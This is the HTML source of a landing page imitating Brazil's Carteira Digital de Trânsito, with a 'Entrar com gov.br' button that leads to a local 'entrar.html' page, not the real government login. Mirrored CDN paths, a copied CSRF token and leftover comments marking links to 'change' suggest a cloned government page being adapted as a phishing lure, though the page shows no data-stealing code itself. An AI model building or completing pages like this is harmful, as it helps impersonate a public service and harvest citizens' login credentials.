<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="preconnect" href="https://fonts.googleapis.com"> <!-- ALTERAR -->
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <!-- ALTERAR -->
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/app/bootstrap.css">
    <link rel="stylesheet" href="./css/app/app.css">
    <link rel="stylesheet" href="./css/pages/blue.css">
    <link rel="stylesheet" href="./../pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous" />
    <link rel="icon" type="image/x-icon" href="./image/blue/favicon.png">
    <meta name="csrf-token" content="ZpNYnEnTYR2SPs4EwnIPOjMuuu7egj6x46rvot2t">

  <style>
    body {
      font-family: 'Montserrat', sans-serif;
    }

    .montserrat-light {
      font-family: 'Montserrat', sans-serif;
      font-weight: 300;
    }

    .montserrat-regular {
      font-family: 'Montserrat', sans-serif;
      font-weight: 400;
    }

    .montserrat-bold {
      font-family: 'Montserrat', sans-serif;
      font-weight: 700;
    }

    .roboto-light {
      font-family: 'Roboto', sans-serif;
      font-weight: 300;
    }

    .roboto-regular {
      font-family: 'Roboto', sans-serif;
      font-weight: 400;
    }

    .roboto-bold {
      font-family: 'Roboto', sans-serif;
      font-weight: 700;
    }
  </style>

    <title>Carteira Digital de Trânsito</title>


</head>

<body>
    <header class="w-100 py-1 box-shadow px-3 d-none">
        <div class="max-w-1200 m-0-auto py-2 d-flex justify-content-between align-items-center">
            <img src="./image/blue/logo.png" alt="" width="110px">

            <div class="font-size-14 text-dark font-weight-500 d-none d-lg-flex justify-content-between">
                <div>
                    <i class="fas fa-adjust text-blue mr-2"></i> Alto Contraste
                </div>

                <div class="ml-5">
                    <i class="fas fa-assistive-listening-systems text-blue mr-2"></i> VLibra
                </div>
            </div>
        </div>
    </header>

    <main class="">
        <section class="w-100">
            <div class="bg-image-blue">
                <div class="index-card box-shadow p-4 text-dark bg-white">
                    <h5 class="text-blue font-weight-700 font-size-18 mb-4">
                        Bem-vido à <br />Carteira Digital de Trânsito (CDT)
                    </h5>

                    <div class="text-dark font-size-13 mt-2 mb-3">
                        Ao entrar, você concorda com nosso <a href="./" class="text-blue font-weight-500">Termo de 
            Responsabilidade</a> e <a href="./" class="text-blue font-weight-500">Política de
            Privacidade</a>.
                    </div>

                    <div class="w-100 px-0 d-flex justify-content-center mb-2">
                        <a href="./entrar.html" class="btn-cta"> <!-- VER QUAL VAI SER O CAMINHO CORRETO-->
            <i class="fas fa-user mr-1"></i>
            Entrar com gov.br
          </a>
                    </div>
                </div>
            </div>
        </section>
    </main>

    <footer class="">

    </footer>

    <!--<script src="./../code.jquery.com/jquery-3.6.0.min.js"></script>-->
    <script src="./../maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

    <script>
        $(document).ready(function() {
            $('html, body').animate({
                scrollTop: $(document).height()
            }, 1000);
        });
    </script>

</body>


</html>